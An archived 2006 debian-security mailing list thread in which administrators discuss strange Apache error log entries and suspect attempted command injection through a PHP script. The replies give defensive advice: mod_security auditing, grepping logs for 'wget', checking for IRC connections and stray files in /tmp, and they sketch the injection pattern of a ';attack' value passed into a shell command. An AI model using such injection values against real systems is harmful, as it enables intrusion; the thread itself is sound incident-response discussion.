RE: Weird message in my apache error log

To: "'Josep Serrano'" <mylists@montblanc.homeip.net>, <debian-security@lists.debian.org>
Subject: RE: Weird message in my apache error log
From: "David Johnson" <djohnson@jsatech.com>
Date: Wed, 1 Feb 2006 07:44:13 -0600
Message-id: <[🔎] 004e01c62735$96e24900$1e02a8c0@daviddell>
In-reply-to: <[🔎] 20633.192.165.213.18.1138791181.squirrel@montblanc.homeip.net>

I've seen this type of thing with PHP; I was going to say something but I
figured I would wait since you didn't mention it.  Can you correlate the
time/date/ip with the request from access.log?  It might give you more
information.  I can say, that we get attacked regularly on Sarge and we're a
relatively high volume site with the similar specs, and I've not seen
anything like this as a standard hack - my experience is that this is most
often caused by not filtering/validating forms, global PHP variables, or PHP
scripting errors.  I am very curious to know what's going on.




> -----Original Message-----
> From: Josep Serrano [mailto:mylists@montblanc.homeip.net]
> Sent: Wednesday, February 01, 2006 4:53 AM
> To: debian-security@lists.debian.org
> Subject: RE: Weird message in my apache error log
> 
> Hello guys,
> 
> No, I can't think of any specific application. Yes this web server is
> running a
> couple of php scripts but that's it.
> 
> Following your recommendations I have installed mod_security with the set
> of
> standard rules provided in www.modsecurity.org. I will be following up the
> audit log
> for any clues.
> 
> Be sure that I have strange files, permissions, or open ports in this box.
> I run
> daily checks and I got the vaccines :-)
> 
> Thanks,
> Josep SERRANO.
> 
> > What does your application do? It looks like it is finding a shell
> script
> > somewhere?  We've seen similar things when executing CGI's and not
> filtering
> > the input data so well.  The line 22, 24 make me think there is a script
> > somewhere rather than arbitrary GET data.
> >
> >> -----Original Message-----
> >> Looks like someone is trying to do arbritary commmand execution. You
> >> probably have a script somewhere that says `command $_GET['var']`, and
> >> someone is passing ';attack' as var, but it isn't quite working.
> >>
> >> I suggest using the audit log feature of mod_security, or just grepping
> >> through your access logs for anything odd ('wget' is a good search
> >> term).
> >>
> >> You might have a bot on the system, check for any odd network
> >> connections, especially to port 6667 (IRC). Also look for www-data
> owned
> >> files in /tmp.
> 
> 
> 
> --
> To UNSUBSCRIBE, email to debian-security-REQUEST@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact
> listmaster@lists.debian.org

Reply to:

Follow-Ups:
- RE: Weird message in my apache error log
  - From: "Josep Serrano" <mylists@montblanc.homeip.net>

References:
- RE: Weird message in my apache error log
  - From: "Josep Serrano" <mylists@montblanc.homeip.net>

Prev by Date: Re: getting to www servers from inside where they have an Internal IP
Next by Date: Re: getting to www servers from inside where they have an Internal IP
Previous by thread: RE: Weird message in my apache error log
Next by thread: RE: Weird message in my apache error log
Index(es):
- Date
- Thread